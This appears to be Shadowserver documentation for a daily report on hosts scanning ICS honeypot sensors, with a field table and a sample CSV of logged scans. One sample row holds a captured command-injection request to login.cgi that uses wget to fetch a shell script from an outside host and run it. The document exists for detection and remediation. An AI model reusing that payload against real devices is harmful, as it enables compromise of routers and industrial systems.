This report identifies hosts that have been observed performing scanning activity against Industrial Control System (ICS) sensors.
Description
Scanning for ICS devices may be a benign activity — for example, having to do with a research project, or performed by an organization like the Shadowserver Foundation looking for open or vulnerable services that it can report to National CERTs and network owners so that they can remediate their networks.
Other scans, however, may be part of a network reconnaissance in the preparatory phase of an attack, or an attempt to exploit the devices being scanned.
Below is a description of a report based on data collected by SISSDEN ICS-aware honeypots. Basic information collected includes the source of the scan and the requests being sent, including the communication state and any other protocol specific details, if available. Note that because the ICS sensors used are also HTTP-aware, observed scans may also include non-ICS related attacks that happen to also hit these sensors. These may be considered false positives from an ICS-related attack perspective, but they may be attacks in themselves too.
Fields
Field | Description |
timestamp | Time that the scan was performed in UTC+0 |
ip | The IP address performing the scan |
port | The source port used in the scan |
asn | ASN announcing the scanning IP |
geo | Country where the scanning IP resides |
region | State / Province / Administrative region where the scanning IP resides |
city | ASN of where the scanning IP resides |
hostname | PTR record of the scanning IP |
protocol | Protocol used to query ICS device, eg.: http, modbus, s7comm |
type | Type of activity observed ie. ics-scan |
dst_ip | The IP address of the target device |
dst_port | Destination port used in the scan |
dst_asn | ASN announcing the target IP |
dst_geo | Country where the target IP resides |
dst_dns | FQDN of the target, if applicable and recorded |
naics | North American Industry Classification System Code of the scanning IP |
sic | Standard Industrial Classification System Code of the scanning IP |
sector | Sector the attacking IP belongs to |
dst_sector | Sector the target IP belongs to |
public_source | Source of the data, for cases where the source accepts being credited |
sensorid | ID of sensor target device |
state | Connection state (if applicable) |
slave_id | Modbus slave id being requested (if applicable) |
function_code | Modbus function code being used (if Modbus query) |
request | Request logged |
response | Response to query |
Delivery Mechanism
The report is sent out daily via The Shadowserver Foundation’s free victim remediation reporting service. All events coming from SISSDEN are clearly marked as “SISSDEN” for every event reported.
Sample Report
"timestamp","ip","port","asn","geo","region","city","hostname","protocol","type","dst_ip","dst_port","dst_asn","dst_geo","dst_dns","naics","sic","sector","dst_sector","public_source","sensorid","state","slave_id","function_code","request","response" "2018-09-16 00:00:54","198.51.100.5”,56066,3462,"TW","KEELUNG CITY","KEELUNG”,”5.dynamic-ip.example.net”,”http","ics-scan”,”203.0.113.10”,80,39324,"FI",,518210,737415,"Communications",,"SISSDEN","000a14be-2fd9-408f-a855-fd7f984f6bca",,,,"('/login.cgi?cli=aa%20aa%27;wget%20http://192.0.2.15/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$', ['Connection: keep-alive\r\n', 'Accept-Encoding: gzip, deflate\r\n', 'Accept: /\r\n', 'User-Agent: Hakai/2.0\r\n'], None)",404 "2018-09-16 06:16:38”,”198.51.100.20”,53757,10439,"US","CALIFORNIA","SAN DIEGO","ubuntu16193.example.com","modbus","ics-scan”,”203.0.113.77”,502,36352,"US",,0,0,"Communications","Commercial Facilities","SISSDEN","0015bab9-528b-4654-9909-45d5e53163c0","NEW_CONNECTION",,,, "2018-09-16 11:46:46”,”198.51.200.30”,1128,57509,"CY","LEFKOSIA","NICOSIA",,"s7comm","ics-scan”,”203.0.113.99”,102,9009,"NO",,0,0,,,"SISSDEN","8b3d7782-2ccd-4ee9-a1f3-83f12014cf27","NEW_CONNECTION",,,, "2018-09-16 23:51:13”,”198.51.200.50”,60565,26599,"BR","SAO PAULO","ITAPEVI",,"http","ics-scan","203.0.113.105”,80,15626,"UA",,0,0,,,"SISSDEN","c010c930-fdbc-458c-b82d-d872d3ef206d",,,,"('/', ['Host: 203.0.113.105:80\r\n', 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36\r\n', 'Content-Length: 0\r\n'], '')",302 "2018-09-16 23:29:47","198.51.200.75”,214,57043,"RU","KALUZHSKAYA OBLAST","OBNINSK",,"s7comm","ics-scan","203.0.113.199”,102,133398,"HK",,0,0,,"Communications","SISSDEN","0fdd59a3-a48d-4d6f-a9c4-a8ee3320575d","NEW_CONNECTION",,,,